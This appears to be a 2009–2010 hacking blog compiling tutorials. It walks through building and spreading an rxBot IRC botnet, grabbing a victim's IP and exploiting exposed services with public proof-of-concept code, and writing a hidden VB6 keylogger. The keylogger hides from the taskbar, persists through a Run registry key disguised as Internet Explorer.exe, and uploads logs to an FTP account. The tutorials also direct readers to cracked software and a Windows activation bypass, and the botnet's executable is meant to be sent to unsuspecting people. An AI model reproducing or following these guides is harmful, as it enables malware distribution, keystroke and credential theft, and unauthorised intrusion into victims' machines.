Botnet

Monday, December 13, 2010

First lets download all the thing you need

1. Visual Studio 6
2. Visual Studio 6 Service Pack 5
3. Visual Studio 6.0 Processor Pack
4. Windows XP Core SDK
5. IRCPlus 1.5 + Crack (Follow the A, B, C to download)
A... (sign up to sub7)
B... (then click here to get the pass and username for the download)
c... (click here to download)
6. mIRC
7. http://www.no-ip.com account (ill go into this a bit more later on)
8. Bot Source
 
Second Lets Setup Microsoft Visual C++ 6.0
1. Run Microsoft Visual C++ 6.0 setup.exe and install it
2. Install the Service Pack 6
3. Install Windows XP SDK
4. Open up Microsoft Visual C++ Compilier 6.0
5. Go to Tools > Options and Click the "Directories" tab
6. Browse to these directories and add them to the list: (Click the dotted box to add, make sure they go in this order)
C:PROGRAM FILESMICROSOFT PLATFORM SDK
C:PROGRAM FILESMICROSOFT PLATFORM SDKBIN
C:PROGRAM FILESMICROSOFT PLATFORM SDKINCLUDE
C:PROGRAM FILESMICROSOFRT PLATFORM SDKLIB

Time To Make a No-Ip Account

This will help stop people getting your IP address.
1. Goto No-Ip.com an make an account
2. Setup a free Host redirect e.g botnet.no-ip.biz
3. Click on downloads to download your No-IP Dynamic DNS Update Client
4. Run and install the file you downloaded, now leave this for now.

Time to install your IRC_plus 1.5
This is were your host will be (were your actual IRC will be stored). Now you dont need to find/Root a box (anyways lets carry on)
1. Install IRC_plus
2. Use the crack "It will say it never worked, even tho it did :S)
3. Now open IRC plus "Remote Control"

Time to setup the mIRC client
The client is so you can connect to your host that you just setup. Without this you would never be able to see the chat room haha.
1. Install mIRC
2. Open mIRC and fill in the usual crap: like name, email, nick blah blah and press ok
3. Now click File> Select Server> Click Add> "fill it out as below"

Description: What ever you want
IRC SERVER: enterwhatyoumade.no-ip.biz (Use the no-ip DUS you made)
Ports: 6667 (this is the most common used but it can be 6000-6010, use whats in your bots config an the one you used in your host)
Group: what ever you want
Password: Password you made in IRCplus

4. Press Add> Press OK
5. Leave mIRC open, open No-IP DUC and Open IRCplus
6. Go back to mIRC and press the lightining bolt in the top left area.

You should now be connected to you server, Now type:

/OPER admin password (Make sure to change password to the one you made on your host)

/join #youchannel (make sure you replaced your channel with the one you made on your host)

You sould now be on you IRC chat room (channel). If you are then your doing good, if not start this TUT again and follow everystep to the letter dont skip ahead at any time.

Now the Bit You Have Been Waiting For: Setting Up Your Bot
1. Unpack "rx-asn-2-re-worked_v3.rar" Bot Source
2. You should see an rx-asn-2-re-worked v3 folder
3. Open the rx-asn-2-re-worked v3
4. Open configs.h folder and edit these lines only
// bot configuration (generic) - doesn't need to be encrypted2001
int port = 6667;        // server port (Change to 6667 or the port your IRC uses)

:
#else  // Recommended to use this only for Crypt() setup, this is unsecure.
char botid[] = "Mr Bumbastic";       //Change to what you want the bot to be called
char version[] = "0.1";        // Change What version you want it to be called
char password[] = "password";         // change to a password you will use inside your irc so bots know its you
char server[] = "yournoipduc.no-ip.biz";        // Change to the No-ip DUC address that you made.
char serverpass[] = "paswords";        // Change to the server password you made on ICRplus host
char channel[] = "#bots";        // Change to the channel you made on ICRplus host
char chanpass[] = "";        // Best to leave this blank, we dont need we have a server password
char server2[] = "";                        // Does not work so make it blank
char channel2[] = "";                        // Does not work so make it blank
char chanpass2[] = "";                        // Does not work so make it blank
char filename[] = "crss";            // What you want your bot to be called in Task manger (i think hmmm)
char keylogfile[] = "keylog";                // keylog filename (says it all haha
char valuename[] = "Microsoft";        // value name for autostart (not to important so leave it as microsoft)
char nickconst[] = "zombie";                    // change to first part to the bot's nickname in IRC
char szLocalPayloadFile[]=".exe";    // What you want your bot to be called in Task manger
char modeonconn[] = "-xi+B";                    // Havnt got a clue so just leave it
char exploitchan[] = "#bots";                        // Channel where exploit messages get redirected
char keylogchan[] = "#bots";                        // Channel where keylog messages get redirected
char psniffchan[] = "#bots";                        // Channel where psniff messages get redirected

5. Save it and close Visual Studio 6
6. Now open the rx-asn-2-re-worked v3 folder again > open rBot.dsw
7. Now right click Rbot file and click build.

1. Download and unpack: Rxbot 7.6 (212.3 kb) Mirror 2 Mirror 3 2. You should see an Rxbot 7.6 folder 3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

8. Your botnet will be save in rx-asn-2-re-worked v3> Debug folder
9. Send this to people rBot.exe to people

Lastly Using the bot
Firstly i am just going to give you very basic commands to use. Make sure you have mIRC, No-IP DUC, IRCplus running and have some bots already.
1. Ok now connect to your server using mIRC
2. Make sure your the admin (/oper admin password)
3. Use the commands
.Login botpassword
(You have to do this first so the bots listen to you, make sure botpassword is what you set in config.h)

.Remove (in case you opened it on your pc, also removes from other pc's and leaves nothing behind)

Validate Windows

1) Open Notepad
2) Paste the following code
Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
    "CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
    "ProductId"="55274-640-7450093-23464"
    "DigitalProductId"=hex:a4,00,00,00,03,00,00,00 ,35, 35,32,37,34,2d,36,34,30,2d,\
    37,34,35,30,30,39,33,2d,32,33,34,36,34,00,2e,00,00 ,00,41,32,32,2d,30,30,30,\
    30,31,00,00,00,00,00,00,00,62,fc,61,4c,e0,26,33,16 ,05,d3,54,e7,a0,de,00,00,\
    00,00,00,00,49,36,c2,49,20,47,0c,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,33,33,35,30,30,00 ,00,00,00,00,00,00,65,10,\
    00,00,74,99,dd,b0,f7,07,00,00,98,10,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,c4,ae,d6,1c
    "LicenseInfo"=hex:e7,77,18,19,f8,08,fc,7d,e8,f 0,df ,12,6e,46,cb,3f,ad,b2,dd,b9,\
    15,18,16,c0,bc,c3,6a,7d,4a,80,8b,31,13,37,5a,78,a2 ,06,c8,6b,b9,d9,dd,cc,6a,\
    9c,c5,9b,77,aa,07,8d,56,6a,7c,e4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
    "OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33, 93,f d

3) In notepad click File menu then Save.
4) For file type in the save dialog box select "All Files" and for the filename type in ValidateXP.reg or whatever you want. It doesn't matter as long as it has the .reg extension.
5) Click Save.

6) Now, double-click the file.
7) It will ask you "Are you sure...?".
8 ) Tell It "Hell Yes" and press OK.

You may need to restart your computer

Windows Command

Run Commands

compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt
 
Run Commands to access the control panel
appwiz.cpl -Add/Remove Programs control
timedate.cpl -Date/Time Properties control
desk.cpl -Display Properties control
findfast.cpl -FindFast control
inetcpl.cpl -Internet Properties control
main.cpl keyboard -Keyboard Properties control
main.cpl -Mouse Properties control
mmsys.cpl -Multimedia Properties control
netcpl.cpl -Network Properties control
password.cpl -Password Properties control
mmsys.cpl sounds -Sound Properties control
sysdm.cpl -System Properties control
 
Command Prompt
ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original device drivers.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.
EXPAND Expand a M*cros*ft Windows file back to it's original format.
EXTRACT Extract files from the M*cros*ft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.
FTP Command to connect and operate on a FTP server.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early M*cros*ft Virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications

Ip Address Hack

Sunday, December 6, 2009

Now i have seen people ask this question over and over and over. So i thought of making a

detailed tutorial on this, which might help "some" people.


Intro:

This tut does require certain basics, so i suggest beginners should read about ports and other things
(although i have explained it here it might be intermidiate level).
Now basically you cannot just do anything youwant with the ip adress. You can but you need right things some mind and also luck.

Anyways lets begin shall we.



Getting an Ipaddress:

Ok there are lots of ways of getting an ip address. For example you can use ipget plugin of

msnplus and send him a picture or a smiley that he doesn't have. Or you can do this the

easy and effective way:

http://www.reza24.com/ip/
Now this site basically has some scripts installed, and when you register to them they give

you a referal link like reza24.com/id=1180 something. All you have to do is give it to your

victim and say "Hey can you check if this site is opening? Its not opening for me."

He clicks and you get his ip EMAILED to you, instantly.


Also keep in mind that not all ipaddresses are static. Some isp provide dynamic addresses,

so its matter of time the user will turn off his net and the ip will be changed. So try to

hack him as soon as you get his ip.

That sums up that part of getting victim's ip. Lets move on to hax0ring.



Port Scanning:

First thing you do is try to ping the ip. So if the victim is online you will get reply

else request timed out.

In my case yep he is online. Lets scan for open ports now.

1) I use Blues port Scanner you can download from: 

http://depositfiles.com/files/i1psjerg3

The result now:

Interesting ports on *ipaddress*:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https 1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown



Take note of all the ports that you see listed before you. Most of them will be paired up

with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc…) Simply take

all that information and paste it into notepad or the editor of your choice. But there is

one problem, we all know its not that easy, we dont even know what type of software or what

operating system that this system is running.


2) NMAP - Port Scanner Has unique OS fingerprinting methods so when the program sees a

certain series of ports open it uses its best judgement to guess what operating system its

running. Generally correct.

So we have to figure out what type of software this box is running. Many of you have used

TELNET for those who haven't TELNET is used to open a remote connection to an IP Address

through a Port.

Download:
www.nmap.org

Translations:
we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.

So say we typed ‘TELNET -o xxx.xxx.xxx.xxx 25′ This command will open up a connection

through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the

screen. you may think, well what the hell, how is that little string of text going to help

me. Well get that list you are starting to write, and copy the banners into your

compilation of the information you've gathered on your target. Banners/Headers are what you

get when you TELNET to the open ports. Heres an example of a banner from port 25.


220 7thsage.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400

Now this is a very important part in the enumeration process. You notice it says ‘Sendmail

8.12.8/8.12.8′ Well what do ya know, we now have discovered a version number. This is where

we can start identifying the programs running on the machine. There are some instances in

which companies will try and falsify their headers/banners so hackers are unable to find

out what programs are truly installed. Some ports may not have banners.

Other points of interest may be the DNS server, that contains lots of information and if

you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples

email. Well now back to the task at hand. Apart from actual company secrets and secret

configurations of the network hardware, you got some good info.

http://www.securityfocus.com is a very good resource for looking up software

vulnerabilities. If you cant find any vulnerabilities there, search on google. There are

many, many, many other sites that post vulnerabilities that their groups find and their

affiliates. http://www.milw0rm.com is also very popular, but its generally down for me, fools

ddosing it.

At SecurityFocus you can search through vendor and whatnot to try and find your peice of

software, or you can use the search box. I looked up and i found a paper on how Sendmail

8.12.8 had a buffer overflow. There was proof of concept code where they wrote the

shellcode and everything, so if you ran the code with the right syntax, a command prompt

would just spawn. You should notice a (#) on the line where your code is being typed. That

pound symbol means that the command prompt window thats currently open was opened as root.

The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. So now

you have cmd shell infront of you, start doing whatever you want.

HOWEVER its not recommended just leave a text file saying how you did it so they can patch

it. For Blackhats such as mine you can just keep it a secret. This will avoid visits from

unwanted authorities :P


There are many types of exploits out there, some are Denial of Service exploits, where you

shut down a box, or render an application/process unusable. Called denial of service simply

because you are denying a service on someones box to everyone trying to access it. Buffer

Overflow exploits are involved when a variable inside some code doesnt have any input

validation. Each letter you enter in for the string variable will be 1 byte long. Now where

the variables are located at when they are in use by a program is called the buffer. Now

what do you think overflowing the buffer means. We overflow the buffer so we can get to a

totally different memory address. Then people write whats called shellcode in hex. This

shellcode is what returns that command prompt when you run the exploit. That wasnt the best

description of a buffer overflow, however all you need to remember is that garbage data

fills up the data registers so then the buffer overflows and allows for remote execution of

almost every command available. There are many, many other types of attacks that cannot all

be described here, like man-in-the-middle attacks where you spoof who you are. Performed

correctly, the victim will enter http://www.bank.com and his connection will be redirected

to your site where you can make a username and password box, make the site look legit. And

your poor mark will enter their credentials into your site, when they think its really

http://www.bank.com. You need to have a small script set up so it will automatiically

display like an error or something once they try and log in with their credentials. This

makes it seem like the site is down and the victim doenst give it a second thought and will

simply try again later.


____________________________________________________________________________


Summary:


So as a summary of how to 0Wn a box when you only have an IP Address
Method Works On BOTH UNix and Windows. You can do the same with domain names (IE

google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along

those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP

address.

- Port Scan The Address And Record Open Ports.
- Telnet To Open Ports To Identify Software Running On Ports.


3) NetCat:

Like TELNET only better and with a lot more functionality. Both can be used when

you are trying to fingerprint software on open ports.

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any

vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation if there is any, for the proof-of-concept code you will be using

for your exploit*

- Run The Exploit Against The Victim.
- Reap The Cheap-Shot Ownage.


______________________________________________________________________________

WARNING:

This tutorial does not cover up clearing the tracks. If you dare try any of this stuff on a

box you dont have consent to hack on, They will simply look at the logs and see your IP

Address and then go straight to your ISP. So i suggest you learn how to anonymize yourself,

there are lotta tuts here on HF.

Always remember the more info on the system you have the more are your chances to exploit

it.

 

Complete Keylogging

When you are done with this tutorial you will be able to Make and Use a keylogger that is close to fully undetectable,
without the victim getting suspicious. You will be able to keylog just about anyone.

This Guide will be split into 2 parts:
Writing your own undetectable keylogger
- The language
- Logging and storing
- Uploading logs
Setting it up to be un-suspicious and trustworthy
- Binding with other files
- Making sure its existence is hidden

Before we begin i want to point out that this keylogger is NOT perfect.
It will be unable to record some symbols
It will occasionally rearrange a letter with one another if the user types fast
But the passwords should easily get through.

Writing the Keylogger.

In this guide we will be using Microsoft Visual Basic 6.0 (vb6 for short)
If you do not know/have this, dont leave just yet.
Reading this guide its not "Necessary" to have vb6 knowledge (highly recommended tho)
Find VB6 through  the net

Open up VB6 and choose standard EXE.

Put on your form:
3 timers
1 label

double-click your form (design) and you see the source of our keylogger, almost empty at this point.


Go back to the design and set properties for the form
Set the form name to a few random letters (title doesnt matter)
Set Visible = false
Set ShowInTaskbar = false
This should make it invisible from the user.


go back to the source and write the following in the "Form_Load" sub

If app.previnstance = true then end
app.taskvisible = false

Which means that if its already running and opened again, it will not start another keylogger (2 keyloggers running would cause errors), and it will not show in the taskmanagers Program list (but still in process list)

Now lets go to the General Section of our source and declare some API functions in order to start writing. General section can be found by using (General) in the top left scrollbar

There are 2 effective methods to keylog with VB6
- Keyhooks
- GetAsyncKeyState

We will be using GetAsyncKeyState, which checks if a key is being pressed when executed
But before we can start using GetAsyncKeyState we must declare it in the general section

GetAsyncKeyState Declaration:
 Private Declare Function GetAsyncKeyState Lib "user32" (byval vkey as long) as integer
^ tells what Lib we need for GetAsyncKeyState.

With this code placed we can start using GetAsyncKeyState commands.

To find out what key is pressed we need to use getasynckeystate as so:
If GetAsyncKeyState(number) <> 0 then
'code to execute if key is pressedend if
Now you might be wondering what the "number" means, actually, the number we type here is a keyboard key,
you see, every key has a number (KeyCode), from around 1 to 200. (1 and 2 being mouse buttons)
KeyCodes Value
http://msdn.microsoft.com/en-us/library/aa243025%28VS.60%29.aspx
 
 Thats alot of keycode. Now, theres an easy way of checking all of the keys at the same time. But it appears that doing it causes alot of weird symbols and capital letters only.
But i want it done properly so im gonna check One key at a time. You can decide yourself what you want to do.
I will show you the easy method too later on tho.

Now that we know how to check for a keypress we want it to write it down somewheres temporary. There are many ways to do so, i will be using a label. You can use a String aswell.
Set the caption of the label to nothing. Now a full example of the letter "a" would be this:
if GetAsyncKeyState(65) <> 0 then
label1.caption = label1.caption + "a"end if
So that if "a" key is pressed an "a" is added to our label.

Code 65-90 is a-z

To check if a key is pressed more than one time we put the code in a timer. I find that it works best when the interval is set to around 125.
Which means that the code is executed 8 times a second. (125 milliseconds). You must change the interval from 0 to 50-150, else it will not work. you can change the interval in the properties of the timer
If you have less interval, it might double record the keystroke, if you have more, it might miss it.
To start writing to a timer either choose "timer1" in the scrollbar in the top-left corner of the source page, or double-click the timer icon on the form design
Do this again and again with all keys from a-z, and numbers 0-9 (also in numpad)

Now it records letters and numbers, not bad, but we are far from done yet.
if we finished up now our logs would be one big pile of letters, pretty much unreadable.
so what we need to do is add spaces, and a hell lot of em. The user browses around alot, clicking here and there, so if we add spaces on keys like mouse buttons, space, enter, ctrl etc. we would get something readable with alot of spaces.
So find Keycodes for those keys and add a space to the label if pressed. Most important is the mouse clicks.

now, were not done just yet. We want to check if a letter is Capital. we do that by checking if shift or caps-lock has been pressed before every key. And if it has, make it print a capital letter instead.

Now to do this, we want to use booleans (true / false), so goto the general section and write this:
dim caps as boolean
The keycode for capsLock is 20. We want to write capslock like this in the timer.
 
 if GetAsyncKeyState(20) <> 0 then
if caps = true then
label1.caption = label1.caption + "(/caps)"
caps = false
goto a
end if
label1.caption = label1.caption + "(caps)"
caps = true
end if
a:
 
The above code may seem a little confusing, but its simple really. when CapsLock is pressed it writes (caps) into the label. and sets our boolean "caps" to "True".
The next time capsLock is pressed (to disable it) instead of writing (caps) it writes (/caps). and Sets "caps" to "False". That way you will know that the letters between (caps) and (/caps) is all capital. Nice!
Everytime Caps-lock is pressed, it will add (caps) or (/caps) according to the state of the caps boolean.

Its a little different with shift. Shift has the keycode 16 btw.
dim "shift" as boolean in the general section. just like before.
If GetasyncKeyState(16) <> 0 then
shift = true
end if

So if Shift is pressed the "shift" boolean becomes true. now in all codes checking for letters add this:
example with "a" key:
 
 
if GetAsyncKeyState(65) <> 0 then
if shift = true then
label1.caption = label1.caption + "A"
shift = false
goto b
end if
label1.caption = label1.caption + "a"
end if
b:
 
 (remember to use a different letter(s) in the goto commands every time)

So if Shift has been pressed, the next key being pressed will be capital. Nice!
NOTE: You can do this with numbers too to get their symbol instead.

You should now have in your timer, checking for a-z (all with shift check), alot of keys making spaces, capslock check, 0-9.
Now. 2 very important keycodes are missing on the site, so i put them here
Dot: Getasynckeystate(190)
Comma: Getasynckeystate(188)

We are now able to goto the next step. Writing to a Text Document.

Having the logs in a label is not enough. We need to write it to a textfile every now and then.
This process is really simple actually. Open up the source for the second timer (Timer2)
and write following.
 On Error GoTo skip
If Dir("c:\windows\klogs.txt") <> "" Then
Open "c:\windows\klogs.txt" For Append As #1
Write #1, Label1.Caption
Close #1
Else
Open "c:\windows\klogs.txt" For Output As #1
Write #1, DateTime.Time
Write #1,
Write #1, Label1.Caption
Close #1
End If
Label1.Caption = ""
skip:
 
 dont worry, ill explain.
The DIR command checks if a file exists. if it exists it executes the code below it, if it does not exist, it executes the code below "Else"
the "Open" creates/opens a textfile, in this case, klogs.txt, you can change this. you can also change the location of it. Just locate it somewhere that the victim wont look.
the "for output as #1" just gives the file a number so it knows what file to write to later on (incase more files are open), Output writes the text file, Input reads the text file, and Append adds more text to the existing text in the textfile. Also as you may notice, if the file does not exist then it writes the time of day into the file. This is usefull for keeping track of when the specific log were from. In this case we only use Output and Append
"write #1, label1.caption" this writes the content of our label into file #1.
"close #1" closes the file.
'Label1.caption = "" ' This deletes the content of our label1 which stores the info. We dont wanna write the same stuff to it again.
Now dont worry. all of this writing and creating happens invisibly.
I suggest doing this every 30-60 seconds. (30 seconds = interval of 30000 on the timer)

As said above, we write the Time of day into the log file to help os keep track of it. When the file is first created it will write the time into it. But thats not quite good enough. for us. We want it to write the time of date into the file everytime the keylogger is being opened again (usually after shutdown)
So write this to the "Form_Load":
 
 If Dir("c:\windows\klogs.txt") <> "" Then
open "c:\windows\klogs.txt" for append as #1
write #1,
write #1, DateTime.time
write #1,
close #1 
 
 So now it stores Time marks everytime its opened.

NEAT! now every 30-60 seconds all logs is stored in a text document.
At this point you should try debugging the file. (little blue triangle button)


you will see nothing. but the keylogger is running.. try opening notepad or something and type something. after a minute or so, stop debugging (square button right of the debug button) and check the textfile (at your chosen location)
it should contain everything you wrote. If not. Re-Check the last steps.

Now. an important thing we must not forget is to make it run on startup =)
there are 2 ways to do that, i will explain them both and let you choose which one to use.

1: Registry keys

Here we copy the file to system32 and add an autorun reg-key to it so it starts when you start the computer. here how to do it:

First we want to see if it already has one startup key. go to the Form_Load section again and write this:
if Dir("c:\windows\system32\Internet Explorer.exe") <> "" then
else
regist
end if
 
 This means that if the file in system32 (Internet Explorer.exe) already exists (will explain the name later) then it does nothing
but if the file does not exist, it calls the sub called "regist". which copies the file and add a registry key to it. We're gonna write the "regist" sub now:

add this at the bottom of the code:
Private Sub regist()
Dim regkey
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\windows\system32\Internet Explorer.exe"
Set regkey = CreateObject("wscript.shell")
regkey.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet Explorer.exe", "c:\windows\system32\Internet Explorer.exe"
End Sub

Its copies the file itself to system32 as Internet Explorer.exe (will explain in a moment), and then adds an autorun key to it.

Thats basically the registry method. Here is the Other method.

2: Copy to startup method.

again, start with going to the Form_Load (IF you choose to use this method) and add "startup" which calls the startup sub we are about to make.
Make a new sub called startup at the bottom of the code, like this:
Private Sub startup()
Dim startpath
Dim path As String
Set startpath = CreateObject("WScript.Shell")
path = startpath.Specialfolders("Startup")
FileCopy app.path & "\" & App.EXEName & ".exe", path & "\Internet Explorer.exe"
End Sub
 
 This searches for the Specialfolder "startup" and copies itself to there with the Internet Explorer name,

If you want you can add VB attributes (setattr commands), like vbhidden or vbsystem. but i dont recommand that cause i had some problems with those attributes myself

Now choose one of the methods for startup (not both of them tho) and move on.

Now The final part is the most important one.
This is where we Upload the textfile to our FTP account. You MUST have your own ftp account for this part. I suggest using http://www.0catch.com (its a zero), there you can create a free account
create a free ftp account there.
Once you have your FTP account. We need to add a Internet Transfer Control component to our form. You do that by going to Project >> Components. (ctrl + T)
Find Microsoft Internet Transfer Control 6.0 and Tick it


press ok.
Now a new item is availible in the toolbox (Inet). drag it to your form.
select properties for it:
Protocol: icFTP
Username: Username.0catch.com (your 0catch username)
Password: your 0catch Password
Remotehost: http://www.0catch.com
and thats it.
now the "URL" should say something like this:
ftp://username.0catch.com:password@0catch.com

Now we are connected to the FTP when executed.

We must use this connection to upload the logs to the FTP. we want to do that about every 90 seconds (since 90 seconds is max interval in timers).
set Timer3's interval to 90000 (1½ minute) or less.
then in Timer3's source write this:
 
On error resume next
Inet1.Execute , "PUT c:\windows\klogs.txt /" & DateTime.Date & ".txt"

Now, this finds our log (klogs.txt) and uploads it to the selected FTP, the files name will be the date of the day it is being run. This is so we can prevent overwriting previous logs by creating a new log for every day. This also makes it easier to find the log you need.
The "On error resume next" prevents the program from crashing if one log fails to upload. but instead tries again (errors happen rarely tho, but recommended to have)

if you have a subfolder for the logs you can type "/subfolder/" & DateTime.Date & ".txt"

Was that it? YES! its really that easy to upload a file. woowee!

Now. in the "LOAD" part add this:
label1.caption = ""
To make sure the label is empty when opened.

Now i promised also to show the lazy way.. which is not as good.

I DO NOT RECOMMEND USING THIS:
this method uses Integer and a loop to do all keys.
dim i as integer
for i = 1 to 120
if GetAsyncKeyState(i) <> 0 then
label1.caption = label1.caption + chr(i)
end if
next  

in this method "i" is 1-120. "i" starts being 1, and everytime it reaches the next command it starts at "for" as 1 higher. untill 120.
all letters will be caps and alot of weird symbols will appear.
"chr(i)" chr = character, "i" is again, the keycode.
AGAIN: I RECOMMEND IGNORING THIS PART OF THE GUIDE. its not that good.

Now, go to the design again and click the form itself (not any of the items inside the form) look through the options and find the Icon option. change the icon to Internet Explorer Icon

guess what. were almost done. We now should have a very undetectable keylogger (80-95% UD)
NICE!. give it a test shot on your own computer by saving it as .EXE to your computer (debugging wont work now since we made it copy itself).
At this point you should save the project to your computer, you can also make the EXE file.(Save as Internet Explorer.exe)
Thats it for the first part. Get ready for part 2!

Setting it up to be trustworthy
Now. An EXE file that appears to do nothing when opened seems a little suspicious, doesnt it?
So there is a few ways to disguise it.
1. Binding it with another file.
2. Writing another program into it in VB6.

I prefer the first solution since it takes a long time to make it look like the game etc. closes when closebutton pressed.
and it would take multiple forms aswell.. so we will stick with Binding with another file or game of yours.
